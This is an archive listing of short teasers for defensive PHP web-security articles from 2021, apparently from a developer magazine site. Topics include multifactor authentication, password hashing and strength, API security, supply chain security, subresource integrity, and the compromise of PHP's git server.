Posts marked with “security”

Security Corner: The Pit of Success

by · September 11, 2021

0
 

Security is often difficult to get right, even for those who are experts in the field. Mistakes are easy to make and result in our users falling into a pit. All developers should practice a stance of “security by default.” Doing so means ensuring that any mistakes land users in a pit of success rather […]

 

Security Corner: Multifactor Authentication

by · August 14, 2021

0
 

A modern security best practice is to both implement and require a form of authentication beyond a simple password. This practice is known as “multifactor” authentication, as users will have a primary factor—their password—and a secondary factor to successfully authenticate to an application. Proper implementation of a multifactor authentication scheme keeps your application and its users safe and secure by […]

 

Security Corner: Evaluating Password Strength

by · July 14, 2021

0
 

An application is only as strong as the authentication systems used to gate entry and protect the data it contains. So long as your users leverage passwords, the weakest link in your security stance is the strength of those passwords. This month we take a deeper look at the strength of passwords and guidance to keep your users’ data […]

 

Education Station: Approaches to API Security

by · June 10, 2021

0
 

The last few months have been a whirlwind of API work. If you’ve been following along, you have a solid grasp of the history of APIs, tools to help design your APIs, and a good lump of tips on how to turn that API design into reality. But, for the sake of space, I left […]

 

Security Corner: Radical Transparency

by · May 12, 2021

0
 

Last month, news broke of a breach of the PHP community’s development Git server. This breach included the addition of two malicious commits to the language’s source code. The malicious code was immediately identified and removed; the team is taking further steps to ensure this kind of situation never occurs again.

 

Security Corner: Basics of Password Hashing

by · May 2, 2021

0
 

By Eric Mann Every web application that allows users to authenticate needs to ensure their users’ credentials are afforded the best protection possible. Conventionally, this is done by storing only the hash of a password rather than the password itself. Luckily, password hashing in PHP is secure, safe, and remarkably straightforward to implement. Last month […]

 

Security Corner: Basics of Password Hashing

by · April 9, 2021

0
 

Every web application that allows users to authenticate needs to ensure their users’ credentials are afforded the best protection possible. Conventionally, this is done by storing only the hash of a password rather than the password itself. Luckily, password hashing in PHP is secure, safe, and remarkably straightforward to implement.

 

About PHP’s Compromised Git Commit

by · April 1, 2021

0
 

PHP internals contributor Sara Golemon answers questions from a panel of php[architect] and PHP Ugly contributors about the recent git compromise that affected the PHP project and what they’re doing about it. You can also watch a video of the roundtable with Sara. More on This From Rasmus Lerdorf: It wasn't, but we caught it […]

 

Security Corner: Supply Chain Security

by · February 8, 2021

0
 

The recent security breach of SolarWinds was one of the worst the community has seen in recent years. It isn’t due to the used hack’s severity but the impact on almost all of SolarWinds’ downstream customers. Let’s look at if something like this could happen in the PHP ecosystem and what we could do to […]

 

Security Corner: Enforcing Subresource Integrity

by · January 8, 2021

0
 

Any scripts or styles you include into your web application are called “subresources.” As these files can impact your application’s overall operation, it is critical for writing secure software that you ensure the integrity of any subresource loaded into the page. Otherwise, an untrusted party might inject malware, cryptocurrency miners, or another malicious payload into […]